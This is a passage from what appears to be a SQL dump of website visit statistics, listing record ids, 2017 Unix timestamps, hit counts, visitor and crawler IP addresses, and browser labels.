0,1,0,'66.249.69.60',''),(89904,1487884250,1,0,1,0,'66.249.69.52',''),(89905,1487884525,1,1,0,0,'164.132.161.8','other'),(89906,1487884534,1,0,1,0,'68.180.229.99',''),(89907,1487884798,1,0,1,0,'66.249.75.28',''),(89908,1487885602,1,0,1,0,'66.249.69.56',''),(89909,1487886960,1,1,0,0,'164.132.161.5','other'),(89910,1487887032,1,1,0,0,'164.132.161.93','other'),(89911,1487888068,1,0,1,0,'66.249.75.28',''),(89912,1487888770,1,1,0,0,'66.249.69.52','chrome'),(89913,1487888980,1,1,0,0,'163.172.64.199','other'),(89914,1487889386,1,1,0,0,'51.255.65.45','other'),(89915,1487889780,1,0,1,0,'68.180.229.99',''),(89916,1487889847,1,1,0,0,'66.249.75.28','chrome'),(89917,1487890134,1,1,0,0,'164.132.161.93','other'),(89918,1487890334,1,1,0,0,'164.132.161.65','other'),(89919,1487890679,1,1,0,0,'163.172.64.253','other'),(89920,1487890912,1,1,0,0,'164.132.161.54','other'),(89921,1487891029,1,1,0,0,'163.172.64.179','other'),(89922,1487891044,1,1,0,0,'40.77.167.114','other'),(89923,1487891722,1,1,0,0,'51.255.65.38','other'),(89924,1487891866,1,1,0,0,'51.255.65.65','other'),(89925,1487892585,1,1,0,0,'164.132.161.37','other'),(89926,1487892636,1,1,0,0,'163.172.64.226','other'),(89927,1487893319,1,1,0,0,'51.255.65.38','other'),(89928,1487893396,1,1,0,0,'51.255.65.89','other'),(89929,1487894715,1,1,0,0,'82.145.221.177','chrome'),(89930,1487894876,1,1,0,0,'180.76.15.158','other'),(89931,1487895180,1,1,0,0,'40.77.167.114','other'),(89932,1487895280,1,0,1,0,'66.249.75.28',''),(89933,1487895429,1,1,0,0,'164.132.161.24','other'),(89934,1487895861,1,0,1,0,'66.249.75.22',''),(89935,1487896572,1,0,1,0,'66.249.69.56',''),(89936,1487896662,1,1,0,0,'164.132.161.80','other'),(89937,1487896776,1,1,0,0,'164.132.161.27','other'),(89938,1487897007,1,1,0,0,'164.132.161.51','other'),(89939,1487897124,1,1,0,0,'51.255.65.48','other'),(89940,1487898655,1,1,0,0,'51.255.65.40','other'),(89941,1487902141,1,1,0,0,'51.255.65.51','other'),(89942,1487902393,1,1,0,0,'164.132.161.35','other'),(89943,1487902600,1,0,1,0,'66.249.69.52',''),(89944,1487903411,1,1,0,0,'163.172.73.28','other'),(89945,1487904518,1,1,0,0,'66.249.75.25','chrome'),(89946,1487904647,1,1,0,0,'164.132.161.55','other'),(89947,1487904936,1,1,0,0,'163.172.64.251','other'),(89948,1487906610,1,1,0,0,'163.172.64.181','other'),(89949,1487906742,1,1,0,0,'163.172.64.185','other'),(89950,1487906816,1,0,1,0,'66.249.69.52',''),(89951,1487906935,1,0,1,0,'66.249.75.22',''),(89952,1487907135,1,1,0,0,'51.255.65.83','other'),(89953,1487907325,1,1,0,0,'163.172.64.223','other'),(89954,1487907591,1,1,0,0,'164.132.161.34','other'),(89955,1487908008,1,1,0,0,'178.255.215.94','other'),(89956,1487909165,1,1,0,0,'163.172.64.248','other'),(89957,1487909201,1,1,0,0,'51.255.65.20','other'),(89958,1487909231,1,1,0,0,'51.255.65.4','other'),(89959,1487910080,1,1,0,0,'51.255.65.82','other'),(89960,1487910819,1,1,0,0,'91.213.59.174','chrome'),(89961,1487910843,1,1,0,0,'141.8.142.175','other'),(89962,1487911449,1,1,0,0,'163.172.64.181','other'),(89963,1487912652,1,1,0,0,'164.132.161.51','other'),(89964,1487912717,1,1,0,0,'164.132.161.60','other'),(89965,1487912865,2,1,1,0,'66.249.69.60',''),(89966,1487914033,1,1,0,0,'164.132.161.44','other'),(89967,1487914489,1,1,0,0,'91.196.178.72','firefox'),(89968,1487914749,1,0,1,0,'66.249.75.22',''),(89969,1487914790,1,0,1,0,'66.249.69.52',''),(89970,1487915975,1,1,0,0,'91.196.178.67','chrome'),(89971,1487916068,1,1,0,0,'51.255.65.72','other'),(89972,1487916891,1,1,0,0,'91.196.178.70','firefox'),(89973,1487917278,3,3,0,0,'91.196.178.66','chrome'),(89974,1487917906,1,1,0,0,'164.132.161.27','other'),(89975,1487917966,1,0,1,0,'66.249.75.25',''),(89976,1487918018,1,0,1,0,'66.249.75.22',''),(89977,1487918065,1,0,1,0,'66.249.69.52',''),(89978,1487918581,1,1,0,0,'91.196.178.71','firefox'),(89979,1487918966,1,1,0,0,'94.178.24.86','chrome'),(89980,1487919250,1,0,1,0,'66.249.75.28',''),(89981,1487919447,1,1,0,0,'91.196.178.69','firefox'),(89982,1487919852,1,1,0,0,'164.132.161.33','other'),(89983,1487920380,1,1,0,0,'51.255.65.87','other'),(89984,1487921091,1,0,1,0,'66.249.75.22',''),(89985,1487921225,1,1,0,0,'51.255.65.41','other'),(89986,1487921280,1,1,0,0,'51.255.65.63','other'),(89987,1487921488,1,1,0,0,'95.133.193.244','chrome'),(89988,1487921574,1,1,0,0,'51.255.65.73','other'),(89989,1487921739,1,1,0,0,'91.196.178.70','firefox'),(89990,1487921870,1,1,0,0,'163.172.64.190','other'),(89991,1487922421,1,1,0,0,'91.196.178.70','chrome'),(89992,1487922751,1,1,0,0,'164.132.161.26','other'),(89993,1487922789,1,1,0,0,'94.179.33.158','firefox'),(89994,1487922899,1,1,0,0,'178.95.24.65','firefox'),(89995,1487923193,1,1,0,0,'37.54.121.92','opera'),(89996,1487923314,1,0,1,0,'66.249.69.56',''),(89997,1487923847,1,1,0,0,'94.179.33.158','firefox'),(89998,1487924177,1,1,0,0,'37.53.231.131','firefox'),(89999,1487924578,1,1,0,0,'217.69.133.222','other'),(90000,1487925729,1,1,0,0,'94.179.30.167','firefox'),(90001,1487925824,2,2,0,0,'51.255.65.47','other'),(90002,1487926098,1,1,0,0,'164.132.161.34','other'),(90003,1487926620,1,1,0,0,'92.112.34.87','firefox'),(90004,1487926861,1,1,0,0,'78.111.190.126','firefox'),(90005,1487927211,1,1,0,0,'51.255.65.26','other'),(90006,1487927346,1,1,0,0,'51.255.65.38','other'),(90007,1487927457,1,1,0,0,'194.0.148.100','chrome'),(90008,1487927627,1,1,0,0,'164.132.161.2','other'),(90009,1487927821,1,1,0,0,'91.196.177.129','chrome'),(90010,1487928342,1,1,0,0,'207.46.13.59','other'),(90011,1487928836,1,1,0,0,'95.132.58.244','chrome'),(90012,1487929021,1,0,1,0,'66.249.75.22',''),(90013,1487929366,1,1,0,0,'157.55.39.44','other'),(90014,1487929576,1,1,0,0,'164.132.161.16','other'),(90015,1487929682,1,1,0,0,'91.196.178.72','firefox'),(90016,1487929942,1,1,0,0,'95.132.58.244','chrome'),(90017,1487929948,9,9,0,0,'69.30.213.202','other'),(90018,1487930212,1,1,0,0,'91.196.178.70','chrome'),(90019,1487930217,1,1,0,0,'51.255.65.10','other'),(90020,1487930398,2,0,2,0,'66.249.75.22',''),(90021,1487930556,1,1,0,0,'91.232.157.98','chrome'),(90022,1487930590,1,1,0,0,'5.255.253.26','other'),(90023,1487931302,1,0,1,0,'66.249.75.25',''),(90024,1487931380,2,2,0,0,'91.196.177.26','chrome'),(90025,1487931562,9,9,0,0,'69.30.198.178','other'),(90026,1487932249,1,1,0,0,'164.132.161.85','other'),(90027,1487932439,1,1,0,0,'164.132.161.28','other'),(90028,1487932512,1,1,0,0,'91.196.178.67','opera'),(90029,1487932735,1,0,1,0,'66.249.75.28',''),(90030,1487932773,1,0,1,0,'66.249.75.25',''),(90031,1487932942,1,0,1,0,'66.249.69.52',''),(90032,1487933212,1,1,0,0,'95.132.58.244','chrome'),(90033,1487933227,1,0,1,0,'207.46.13.59',''),(90034,1487933255,1,1,0,0,'91.196.178.72','firefox'),(90035,1487933533,1,1,0,0,'163.172.64.253','other'),(90036,1487934195,1,0,1,0,'66.249.69.56',''),(90037,1487934839,1,1,0,0,'51.255.65.4','other'),(90038,1487934857,1,1,0,0,'91.196.177.26','chrome'),(90039,1487935026,1,1,0,0,'164.132.161.27','other'),(90040,1487935039,1,1,0,0,'91.196.178.163','chrome'),(90041,1487935304,1,1,0,0,'51.255.65.95','other'),(90042,1487935343,1,1,0,0,'164.132.161.44','other'),(90043,1487935435,1,1,0,0,'217.69.133.3','other'),(90044,1487935799,1,1,0,0,'51.255.65.81','other'),(90045,1487935953,1,1,0,0,'51.255.65.73','other'),(90046,1487936423,1,1,0,0,'46.211.204.53','chrome'),(90047,1487936481,1,1,0,0,'180.76.15.16','other'),(90048,1487936869,1,1,0,0,'163.172.64.246','other'),(90049,1487937036,1,1,0,0,'51.255.65.38','other'),(90050,1487938024,1,0,1,0,'68.180.229.99',''),(90051,1487938065,1,0,1,0,'66.249.75.28',''),(90052,1487938218,1,1,0,0,'164.132.161.3','other'),(90053,1487938237,1,1,0,0,'195.10.210.49','chrome'),(90054,1487938849,1,1,0,0,'163.172.64.199','other'),(90055,1487939194,1,1,0,0,'164.132.161.74','other'),(90056,1487939322,1,1,0,0,'95.132.58.244','chrome'),(90057,1487939507,1,1,0,0,'195.162.90.62','chrome'),(90058,1487939690,1,0,1,0,'66.249.75.28',''),(90059,1487940538,1,0,1,0,'66.249.69.56',''),(90060,1487940725,1,1,0,0,'91.232.157.98','chrome'),(90061,1487940736,1,0,1,0,'66.249.75.25',''),(90062,1487940738,1,1,0,0,'92.112.34.87','firefox'),(90063,1487940918,1,1,0,0,'40.77.167.73','other'),(90064,1487941109,1,1,0,0,'164.132.161.77','other'),(90065,1487941198,1,1,0,0,'91.196.177.46','firefox'),(90066,1487941632,1,0,1,0,'66.249.69.52',''),(90067,1487941860,1,1,0,0,'163.172.64.178','other'),(90068,1487941866,1,1,0,0,'51.255.65.49','other'),(90069,1487942135,1,1,0,0,'94.178.6.96','chrome'),(90070,1487942518,1,1,0,0,'66.249.93.157','chrome'),(90071,1487943163,1,1,0,0,'164.132.161.91','other'),(90072,1487943193,1,1,0,0,'37.54.116.190','chrome'),(90073,1487943399,1,0,1,0,'66.249.75.28',''),(90074,1487943646,1,1,0,0,'51.255.65.23','other'),(90075,1487943941,1,0,1,0,'68.180.229.99',''),(90076,1487943948,1,1,0,0,'163.172.64.183','other'),(90077,1487944096,2,2,0,0,'195.225.48.118','chrome'),(90078,1487944133,1,1,0,0,'91.196.178.70','firefox'),(90079,1487944172,1,0,1,0,'66.249.69.60',''),(90080,1487944631,1,0,1,0,'68.180.230.114',''),(90081,1487944769,1,1,0,0,'178.92.84.206','chrome'),(90082,1487945802,1,0,1,0,'66.249.69.56',''),(90083,1487946088,1,0,1,0,'66.249.69.60',''),(90084,1487946927,1,1,0,0,'51.255.65.56','other'),(90085,1487948156,1,1,0,0,'91.196.178.65','firefox'),(90086,1487948183,1,0,1,0,'66.249.69.56',''),(90087,1487949313,1,1,0,0,'163.172.64.247','other'),(90088,1487949383,1,1,0,0,'163.172.64.246','other'),(90089,1487950615,1,0,1,0,'66.249.69.60',''),(90090,1487951935,1,1,0,0,'164.132.161.24','other'),(90091,1487952017,1,1,0,0,'164.132.161.51','other'),(90092,1487952631,1,1,0,0,'51.255.65.41','other'),(90093,1487952718,1,1,0,0,'91.196.178.37','chrome'),(90094,1487952943,1,1,0,0,'51.255.65.21','other'),(90095,1487953440,1,0,1,0,'66.249.75.28',''),(90096,1487953543,1,1,0,0,'91.196.178.167','chrome'),(90097,1487953552,1,1,0,0,'94.179.44.88','firefox'),(90098,1487953983,1,0,1,0,'66.249.69.56',''),(90099,1487954161,1,0,1,0,'66.249.75.25',''),(90100,1487954461,1,0,1,0,'40.77.167.73',''),(90101,1487954876,1,1,0,0,'128.69.152.114','opera'),(90102,1487955654,1,0,1,0,'66.249.75.22',''),(90103,1487955884,1,1,0,0,'66.249.75.28','chrome'),(90104,1487957387,1,1,0,0,'130.180.216.201','chrome'),(90105,1487958605,1,1,0,0,'51.255.65.68','other'),(90106,1487959426,1,1,0,0,'194.50.51.247','chrome'),(90107,1487959575,1,0,1,0,'66.249.69.52',''),(90108,1487959768,1,1,0,0,'164.132.161.10','other'),(90109,1487960191,1,1,0,0,'195.154.181.15','chrome'),(90110,1487960450,1,1,0,0,'66.102.9.20','chrome'),(90111,1487960633,1,0,1,0,'66.249.75.25',''),(90112,1487961252,1,1,0,0,'46.211.2.74','other'),(90113,1487961609,1,1,0,0,'164.132.161.83','other'),(90114,1487961998,1,1,0,0,'51.255.65.60','other'),(90115,1487963020,1,0,1,0,'66.249.69.60',''),(90116,1487964067,1,1,0,0,'163.172.64.248','other'),(90117,1487965010,1,1,0,0,'164.132.161.14','other'),(90118,1487965028,1,1,0,0,'66.249.69.52','chrome'),(90119,1487965330,1,1,0,0,'163.172.64.177','other'),(90120,1487965774,1,0,1,0,'66.249.75.25',''),(90121,1487966108,1,1,0,0,'163.172.71.55','other'),(90122,1487966736,1,0,1,0,'66.249.69.52',''),(90123,1487967258,1,1,0,0,'91.200.12.49','chrome'),(90124,1487967675,1,1,0,0,'8.37.235.69','other'),(90125,1487967702,1,1,0,0,'95.132.132.48','other'),(90126,1487967752,1,0,1,0,'66.249.75.28',''),(90127,1487968510,1,1,0,0,'180.76.15.147','other'),(90128,1487968633,1,0,1,0,'66.249.75.13',''),(90129,1487970433,1,0,1,0,'66.249.69.56',''),(90130,1487970501,1,0,1,0,'66.249.75.22',''),(90131,1487970878,1,1,0,0,'91.196.178.38','chrome'),(90132,1487972408,1,1,0,0,'162.210.196.97','other'),(90133,1487972581,1,1,0,0,'164.132.161.67','other'),(90134,1487973165,1,0,1,0,'66.249.69.52',''),(90135,1487974229,1,0,1,0,'66.249.75.25',''),(90136,1487974325,1,1,0,0,'163.172.71.29','other'),(90137,1487974410,1,0,1,0,'66.249.69.52',''),(90138,1487974486,1,0,1,0,'66.249.69.60',''),(90139,1487974639,1,1,0,0,'164.132.161.28','other'),(90140,1487974956,1,1,0,0,'5.248.131.242','chrome'),(90141,1487975823,1,1,0,0,'164.132.161.53','other'),(90142,1487978761,5,0,5,0,'68.180.229.99',''),(90143,1487979152,1,0,1,0,'66.249.75.28',''),(90144,1487979158,1,1,0,0,'51.255.65.77','other'),(90145,1487979891,1,1,0,0,'51.255.65.74','other'),(90146,1487981302,1,0,1,0,'66.249.69.60',''),(90147,1487982866,1,1,0,0,'40.77.167.26','other'),(90148,1487982871,1,0,1,0,'66.249.75.22',''),(90149,1487982969,1,1,0,0,'80.64.173.162','other'),(90150,1487983057,1,1,0,0,'164.132.161.76','other'),(90151,1487983273,1,1,0,0,'66.249.69.60','chrome'),(90152,1487984351,2,0,2,0,'68.180.229.99',''),(90153,1487984730,1,1,0,0,'164.132.161.44','other'),(90154,1487985286,1,1,0,0,'40.77.167.111','other'),(90155,1487985967,3,3,0,0,'80.64.173.162','other'),(90156,1487986127,1,1,0,0,'163.172.64.238','other'),(90157,1487986877,1,0,1,0,'66.249.66.183',''),(90158,1487987374,1,0,1,0,'66.249.66.177',''),(90159,1487987447,1,1,0,0,'195.154.181.15','chrome'),(90160,1487987614,1,1,0,0,'157.55.39.193','other'),(90161,1487989133,1,0,1,0,'68.180.229.99',''),(90162,1487989372,1,0,1,0,'66.249.66.180',''),(90163,1487989634,1,1,0,0,'163.172.64.233','other'),(90164,1487990648,1,1,0,0,'163.172.64.182','other'),(90165,1487991325,1,0,1,0,'66.249.66.87',''),(90166,1487991514,1,0,1,0,'68.180.229.99',''),(90167,1487992106,4,4,0,0,'107.150.59.98','other'),(90168,1487992373,1,0,1,0,'66.249.66.84',''),(90169,1487992770,1,1,0,0,'51.255.65.95','other'),(90170,1487992876,1,0,1,0,'66.249.66.183',''),(90171,1487995001,1,0,1,0,'66.249.66.177',''),(90172,1487995072,1,0,1,0,'66.249.66.180',''),(90173,1487995783,1,1,0,0,'51.255.65.39','other'),(90174,1487996116,1,1,0,0,'51.255.65.87','other'),(90175,1487996213,1,1,0,0,'163.172.64.192','other'),(90176,1487996465,1,0,1,0,'66.249.66.84',''),(90177,1487997849,1,1,0,0,'163.172.64.222','other'),(90178,1487999032,1,0,1,0,'66.249.66.183',''),(90179,1487999479,1,1,0,0,'180.76.15.134','other'),(90180,1487999547,1,1,0,0,'163.172.64.230','other'),(90181,1488000366,1,1,0,0,'40.77.167.26','other'),(90182,1488001394,1,1,0,0,'51.255.65.85','other'),(90183,1488001670,1,1,0,0,'164.132.161.51','other'),(90184,1488002698,1,0,1,0,'66.249.66.180',''),(90185,1488003276,2,1,1,0,'66.249.66.84',''),(90186,1488003313,1,1,0,0,'51.255.65.45','other'),(90187,1488003983,1,1,0,0,'51.255.65.40','other'),(90188,1488004554,1,1,0,0,'163.172.64.237','other'),(90189,1488004819,2,2,0,0,'95.213.141.126','opera'),(90190,1488005004,1,1,0,0,'164.132.161.12','other'),(90191,1488005753,1,1,0,0,'40.77.167.100','other'),(90192,1488006510,1,1,0,0,'164.132.161.73','other'),(90193,1488006864,1,0,1,0,'66.249.66.183',''),(90194,1488007601,1,1,0,0,'164.132.161.33','other'),(90195,1488007671,14,14,0,0,'95.34.24.124','other'),(90196,1488007694,1,1,0,0,'91.200.12.49','chrome'),(90197,1488007707,1,1,0,0,'217.69.133.224','other'),(90198,1488008240,1,1,0,0,'164.132.161.74','other'),(90199,1488008351,1,1,0,0,'164.132.161.17','other'),(90200,1488008524,1,1,0,0,'163.172.64.245','other'),(90201,1488008779,1,1,0,0,'40.77.167.111','other'),(90202,1488009067,1,1,0,0,'94.178.147.77','firefox'),(90203,1488009433,1,1,0,0,'164.132.161.72','other'),(90204,1488009444,1,1,0,0,'163.172.64.178','other'),(90205,1488009508,1,1,0,0,'51.255.65.78','other'),(90206,1488009679,2,0,2,0,'66.249.66.180',''),(90207,1488009727,1,1,0,0,'51.255.65.50','other'),(90208,1488009882,1,1,0,0,'164.132.161.33','other'),(90209,1488009935,1,1,0,0,'164.132.161.64','other'),(90210,1488010300,1,0,1,0,'66.249.66.81',''),(90211,1488011394,2,0,2,0,'66.249.66.81',''),(90212,1488011608,1,1,0,0,'164.132.161.38','other'),(90213,1488012010,1,1,0,0,'157.55.39.193','other'),(90214,1488012691,1,1,0,0,'51.255.65.69','other'),(90215,1488014007,1,1,0,0,'141.8.142.58','other'),(90216,1488014009,1,1,0,0,'130.193.50.34','other'),(90217,1488014428,1,0,1,0,'66.249.66.87',''),(90218,1488014623,1,1,0,0,'164.132.161.27','other'),(90219,1488014799,2,2,0,0,'91.121.109.55','other'),(90220,1488015020,1,1,0,0,'164.132.161.55','other'),(90221,1488015341,1,1,0,0,'163.172.64.190','other'),(90222,1488015511,1,0,1,0,'66.249.66.87',''),(90223,1488015596,1,1,0,0,'199.58.86.209','other'),(90224,1488015643,2,0,2,0,'68.180.229.99',''),(90225,1488015712,1,0,1,0,'66.249.66.180',''),(90226,1488015860,1,1,0,0,'163.172.64.249','other'),(90227,1488016339,1,1,0,0,'51.255.65.55','other'),(90228,1488016496,1,0,1,0,'66.249.66.177',''),(90229,1488016576,2,0,2,0,'68.180.229.99',''),(90230,1488016835,1,1,0,0,'51.255.65.62','other'),(90231,1488017054,2,0,2,0,'66.249.66.180',''),(90232,1488018185,1,1,0,0,'164.132.161.19','other'),(90233,1488018219,1,1,0,0,'163.172.64.228','other'),(90234,1488018356,1,0,1,0,'66.249.66.87',''),(90235,1488020689,1,1,0,0,'195.154.181.15','chrome'),(90236,1488021041,1,0,1,0,'68.180.230.114',''),(90237,1488021124,1,1,0,0,'40.77.167.26','other'),(90238,1488021528,1,1,0,0,'46.201.175.171','firefox'),(90239,1488021673,1,0,1,0,'66.249.66.81',''),(90240,1488023806,1,1,0,0,'46.201.175.171','firefox'),(90241,1488023895,1,1,0,0,'91.196.178.66','chrome'),(90242,1488023920,1,1,0,0,'164.132.161.95','other'),(90243,1488024046,1,0,1,0,'66.249.66.180',''),(90244,1488024189,1,0,1,0,'66.249.66.81',''),(90245,1488024436,1,1,0,0,'163.172.64.241','other'),(90246,1488025917,1,1,0,0,'51.255.65.77','other'),(90247,1488026064,1,1,0,0,'51.255.65.11','other'),(90248,1488026107,1,1,0,0,'51.255.65.61','other'),(90249,1488026189,1,1,0,0,'51.255.65.4','other'),(90250,1488026204,1,1,0,0,'51.255.65.2','other'),(90251,1488026557,1,0,1,0,'66.249.66.180',''),(90252,1488026623,1,0,1,0,'66.249.66.177',''),(90253,1488026793,1,1,0,0,'51.255.65.51','other'),(90254,1488027215,1,1,0,0,'51.255.65.23','other'),(90255,1488028124,1,1,0,0,'163.172.64.188','other'),(90256,1488028751,1,1,0,0,'51.255.65.2','other'),(90257,1488028767,1,0,1,0,'68.180.229.99',''),(90258,1488028932,1,1,0,0,'164.132.161.49','other'),(90259,1488029010,1,1,0,0,'164.132.161.23','other'),(90260,1488029401,1,1,0,0,'51.255.65.74','other'),(90261,1488029650,1,1,0,0,'193.194.127.217','firefox'),(90262,1488029961,1,1,0,0,'164.132.161.79','other'),(90263,1488030368,1,1,0,0,'163.172.64.183','other'),(90264,1488030748,1,1,0,0,'195.154.181.15','chrome'),(90265,1488031410,1,1,0,0,'40.77.167.26','other'),(90266,1488032557,1,1,0,0,'164.132.161.92','other'),(90267,1488034021,1,0,1,0,'66.249.66.84',''),(90268,1488034067,1,1,0,0,'164.132.161.40','other'),(90269,1488035492,1,1,0,0,'66.102.9.29','chrome'),(90270,1488036002,1,1,0,0,'164.132.161.41','other'),(90271,1488036157,4,0,4,0,'68.180.229.99',''),(90272,1488037041,1,1,0,0,'163.172.64.224','other'),(90273,1488038453,1,1,0,0,'163.172.64.247','other'),(90274,1488039550,1,0,1,0,'68.180.229.99',''),(90275,1488039624,3,3,0,0,'144.76.38.40','other'),(90276,1488039963,1,1,0,0,'213.133.172.194','chrome'),(90277,1488040410,1,1,0,0,'164.132.161.23','other'),(90278,1488040447,1,1,0,0,'164.132.161.10','other'),(90279,1488040684,1,1,0,0,'51.255.65.61','other'),(90280,1488041766,1,0,1,0,'68.180.229.99',''),(90281,1488042781,1,1,0,0,'164.132.161.45','other'),(90282,1488043179,1,1,0,0,'51.255.65.54','other'),(90283,1488043525,1,1,0,0,'163.172.64.191','other'),(90284,1488043754,2,0,2,0,'66.249.75.25',''),(90285,1488044036,1,1,0,0,'51.255.65.3','other'),(90286,1488045136,1,1,0,0,'164.132.161.94','other'),(90287,1488045252,1,1,0,0,'163.172.64.179','other'),(90288,1488045369,1,1,0,0,'163.172.64.232','other'),(90289,1488045571,1,0,1,0,'66.249.75.22',''),(90290,1488045665,1,1,0,0,'51.255.65.97','other'),(90291,1488045668,1,1,0,0,'40.77.167.100','other'),(90292,1488045779,2,2,0,0,'91.245.122.117','chrome'),(90293,1488045990,1,1,0,0,'130.193.51.19','other'),(90294,1488046415,1,1,0,0,'40.77.167.26','other'),(90295,1488046567,104,2,102,0,'198.204.224.82',''),(90296,1488046842,1,1,0,0,'164.132.161.87','other'),(90297,1488046937,1,1,0,0,'164.132.161.57','other'),(90298,1488047155,1,1,0,0,'195.154.181.15','chrome'),(90299,1488047160,1,1,0,0,'40.77.167.111','other'),(90300,1488047180,1,1,0,0,'95.134.96.18','chrome'),(90301,1488047471,42,0,42,0,'198.204.224.82',''),(90302,1488047520,1,0,1,0,'66.249.69.60',''),(90303,1488047896,1,1,0,0,'164.132.161.55','other'),(90304,1488047908,71,71,0,0,'198.204.224.82','msie'),(90305,1488048214,5,5,0,0,'198.204.224.82','firefox'),(90306,1488048633,1,1,0,0,'91.200.12.49','chrome'),(90307,1488049376,1,1,0,0,'157.55.39.193','other'),(90308,1488049557,1,1,0,0,'163.172.64.187','other'),(90309,1488050006,1,1,0,0,'178.251.111.188','other'),(90310,1488050116,1,1,0,0,'164.132.161.50','other'),(90311,1488050304,1,1,0,0,'51.255.65.87','other'),(90312,1488050746,1,1,0,0,'40.77.167.100','other'),(90313,1488051444,1,1,0,0,'163.172.71.55','other'),(90314,1488051791,1,1,0,0,'164.132.161.11','other'),(90315,1488051803,1,1,0,0,'163.172.64.184','other'),(90316,1488052145,1,0,1,0,'66.249.75.22',''),(90317,1488053319,1,1,0,0,'164.132.161.26','other'),(90318,1488053659,1,1,0,0,'163.172.64.250','other'),(90319,1488054346,1,1,0,0,'164.132.161.83','other'),(90320,1488054397,1,1,0,0,'163.172.64.184','other'),(90321,1488054414,1,1,0,0,'51.255.65.59','other'),(90322,1488054538,1,1,0,0,'66.249.69.56','chrome'),(90323,1488054553,1,1,0,0,'194.50.51.247','chrome'),(90324,1488054582,1,1,0,0,'51.255.65.94','other'),(90325,1488056174,1,1,0,0,'40.77.167.26','other'),(90326,1488057750,1,1,0,0,'164.132.161.22','other'),(90327,1488057929,1,1,0,0,'40.77.167.100','other'),(90328,1488058022,2,0,2,0,'66.249.69.52',''),(90329,1488058336,1,0,1,0,'66.249.69.60',''),(90330,1488058716,1,1,0,0,'164.132.161.51','other'),(90331,1488058783,5,5,0,0,'141.8.142.58','other'),(90332,1488058999,1,1,0,0,'141.8.142.61','other'),(90333,1488059009,1,1,0,0,'91.196.178.39','chrome'),(90334,1488059141,2,2,0,0,'93.158.152.84','other'),(90335,1488059170,1,1,0,0,'141.8.183.19','other'),(90336,1488059320,1,1,0,0,'164.132.161.2','other'),(90337,1488059628,1,1,0,0,'141.8.183.25','other'),(90338,1488060066,1,1,0,0,'93.158.152.84','other'),(90339,1488060079,1,1,0,0,'130.193.50.34','other'),(90340,1488061096,1,1,0,0,'51.255.65.15','other'),(90341,1488061302,1,1,0,0,'164.132.161.94','other'),(90342,1488062280,2,2,0,0,'46.229.168.73','other'),(90343,1488062298,5,5,0,0,'46.229.168.72','other'),(90344,1488062316,2,2,0,0,'46.229.168.75','other'),(90345,1488062334,4,4,0,0,'46.229.168.67','other'),(90346,1488062384,1,1,0,0,'141.8.142.61','other'),(90347,1488062419,2,2,0,0,'46.229.168.65','other'),(90348,1488062426,2,2,0,0,'46.229.168.66','other'),(90349,1488062462,4,4,0,0,'46.229.168.74','other'),(90350,1488062471,1,1,0,0,'40.77.167.26','other'),(90351,1488062487,6,6,0,0,'46.229.168.69','other'),(90352,1488062679,1,1,0,0,'46.229.168.71','other'),(90353,1488062775,1,1,0,0,'46.229.168.68','other'),(90354,1488062798,1,1,0,0,'51.255.65.52','other'),(90355,1488062878,1,1,0,0,'91.196.178.103','other'),(90356,1488062948,1,1,0,0,'51.255.65.12','other'),(90357,1488063643,1,1,0,0,'51.255.65.57','other'),(90358,1488064559,1,1,0,0,'141.8.142.175','other'),(90359,1488065026,1,1,0,0,'141.8.132.10','other'),(90360,1488065341,1,0,1,0,'66.249.75.28',''),(90361,1488065355,1,0,1,0,'66.249.69.52',''),(90362,1488065913,1,1,0,0,'217.69.133.228','other'),(90363,1488066470,1,1,0,0,'163.172.64.232','other'),(90364,1488066688,1,1,0,0,'141.8.142.62','other'),(90365,1488066691,1,1,0,0,'5.255.253.68','other'),(90366,1488066695,1,1,0,0,'141.8.142.67','other'),(90367,1488066698,1,1,0,0,'141.8.183.19','other'),(90368,1488066765,1,1,0,0,'130.193.50.38','other'),(90369,1488066811,1,0,1,0,'66.249.69.56',''),(90370,1488067223,1,0,1,0,'66.249.75.22',''),(90371,1488067615,1,1,0,0,'164.132.161.73','other'),(90372,1488068039,1,0,1,0,'66.249.69.52',''),(90373,1488068231,1,1,0,0,'51.255.65.3','other'),(90374,1488068262,1,1,0,0,'141.8.183.19','other'),(90375,1488068366,1,1,0,0,'51.255.65.76','other'),(90376,1488069034,1,1,0,0,'141.8.142.61','other'),(90377,1488069037,1,1,0,0,'40.77.167.100','other'),(90378,1488069292,1,1,0,0,'163.172.64.242','other'),(90379,1488069858,1,1,0,0,'51.255.65.32','other'),(90380,1488070072,1,1,0,0,'130.193.51.19','other'),(90381,1488070112,1,0,1,0,'66.249.75.22',''),(90382,1488070455,1,1,0,0,'164.132.161.48','other'),(90383,1488071735,1,1,0,0,'164.132.161.88','other'),(90384,1488071912,2,2,0,0,'69.30.198.202','other'),(90385,1488072088,1,1,0,0,'163.172.64.250','other'),(90386,1488073134,1,1,0,0,'164.132.161.68','other'),(90387,1488073196,1,1,0,0,'164.132.161.37','other'),(90388,1488073824,1,0,1,0,'66.249.75.22',''),(90389,1488073906,1,1,0,0,'130.193.50.38','other'),(90390,1488074010,1,1,0,0,'141.8.183.19','other'),(90391,1488074220,2,0,2,0,'66.249.69.60',''),(90392,1488074333,1,1,0,0,'51.255.65.27','other'),(90393,1488074537,1,1,0,0,'130.193.50.34','other'),(90394,1488075032,1,1,0,0,'130.193.51.43','other'),(90395,1488075312,1,0,1,0,'68.180.229.99',''),(90396,1488075946,1,1,0,0,'51.255.65.8','other'),(90397,1488076404,1,1,0,0,'163.172.64.246','other'),(90398,1488076764,1,1,0,0,'141.8.142.175','other'),(90399,1488077483,1,1,0,0,'164.132.161.36','other'),(90400,1488077751,2,0,2,0,'66.249.75.22',''),(90401,1488077785,1,0,1,0,'66.249.75.28',''),(90402,1488078417,1,1,0,0,'51.255.65.2','other'),(90403,1488078524,1,0,1,0,'66.249.69.56',''),(90404,1488079340,1,1,0,0,'164.132.161.7','other'),(90405,1488080045,1,1,0,0,'51.255.65.37','other'),(90406,1488080425,1,1,0,0,'46.48.13.161','chrome'),(90407,1488080678,1,1,0,0,'163.172.73.28','other'),(90408,1488082356,1,1,0,0,'164.132.161.51','other'),(90409,1488082367,1,1,0,0,'66.249.69.52','chrome'),(90410,1488082453,2,0,2,0,'66.249.69.60',''),(90411,1488082475,1,1,0,0,'51.255.65.59','other'),(90412,1488082925,1,1,0,0,'163.172.64.220','other'),(90413,1488082960,1,0,1,0,'66.249.69.56',''),(90414,1488083031,1,1,0,0,'40.77.167.100','other'),(90415,1488083270,1,1,0,0,'164.132.161.34','other'),(90416,1488083369,1,1,0,0,'164.132.161.95','other'),(90417,1488083389,1,0,1,0,'66.249.75.28',''),(90418,1488083605,1,1,0,0,'51.255.65.58','other'),(90419,148